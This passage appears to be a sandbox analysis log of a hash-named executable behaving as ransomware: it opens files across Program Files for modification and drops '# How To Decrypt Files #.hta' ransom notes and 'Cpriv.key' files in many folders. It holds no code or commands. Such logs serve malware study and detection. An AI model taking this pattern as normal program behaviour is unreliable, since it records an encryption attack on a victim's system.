de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00405_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0292272.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0314068.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02028K.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ZoomIcons.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGCAL.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\icon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office.en-us\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0157831.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-spi-actions.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0240157.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02736U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Media Renderer\avtransport.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7\1033\VBOB6.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0309920.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01744_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\gfserrortogroove.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\icon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\fa.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107154.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18181_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsHomePageStyle.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00462_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0195342.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0233312.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\delete_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02134_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\1033\ODBCR.SAM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsPrintTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB1B.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0281640.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app_1.0.300.v20140228-1829.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00512_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR6F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\css\settings.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\eclipse.inf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099167.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsNotesBackground_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00998_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Triedit\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij.bat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01253_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\default_apps\drive.crx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMain.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107350.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\management\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\descript.ion de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Newsprint.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-openide-options.xml_hidden de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Main.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\modules\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\he.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\plugin.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\2052\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-snaptracer.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\NEWS.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\info.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Things\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\VSTA\Bin\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_hov.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00527_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-gibbous.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Update\Install\{790FB95E-131F-4B1A-93CD-438F382AB794}\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01548_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR49B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR49F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB11.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0285822.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\keystore\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_INTRO_BG.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\ACCWIZ\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BRCHUR11.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGNAVBAR.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipssrl.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\BlackTieResume.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\en-US\js\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Tanspecks.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\COMPASS\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02264_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\CNFNOT.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageSmall.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsVersion1Warning.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\RICEPAPR\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\RSSFeeds.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\ONENOTE_F_COL.HXK de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-gibbous.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help_3.6.0.v20130326-1254.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01039_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Soft Blue.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01301_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\PROGRAM.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-uisupport.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02106_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Bibliography\Sort\TITLE.XSL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierCloseButton.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\FLYER.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\add_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-progress.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans_1.2.200.v20140214-0004.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00224_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Waveform.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18245_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\az\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Proofing.en-us de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\BREEZE\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\Presentation Designs\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)alertIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152690.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287642.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\form_edit.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151063.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02465_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR14F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\LEVEL\LEVEL.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\1047x576black.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21505_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21519_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\cmm\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft 